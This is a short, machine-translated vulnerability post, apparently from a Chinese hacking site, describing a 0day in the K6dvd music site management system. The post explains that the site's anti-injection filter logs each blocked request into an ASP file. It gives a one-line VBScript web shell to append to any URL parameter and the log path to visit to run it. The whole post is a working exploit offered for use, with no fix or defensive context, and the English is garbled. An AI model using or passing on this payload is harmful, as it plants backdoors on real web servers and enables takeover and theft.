K6dvd music network 0day(bypass anti-injection)-vulnerability warning-the black bar safety net

ID MYHACK58:62201130129
Type myhack58
Reporter 佚名
Modified 2011-04-20T00:00:00


K6dvd music network 0day

K6dvd television system is the domestic good music leave management system!

Just find the one with a parameter of the URL to submit a' returns the following:


Well, the anti-injection system! Most engage in penetration friends should have seen~

Illegal operation! The system made the following record↓ The operation of the IP: xxx. xxx. xxx. xx Operation time: 2009-5-28 1 9:3 3:4 7 Operation page:/yxplay. asp Submit way: GET Submitted parameters: id Submit data: 1 0 9 4 4 6'

Using the method, in any of the URL parameters behind the belt and =><script runat=server language=vbscript>eval request(chr(3 5))</script>

And then access the data/%23sql. asp can perform the word pony.: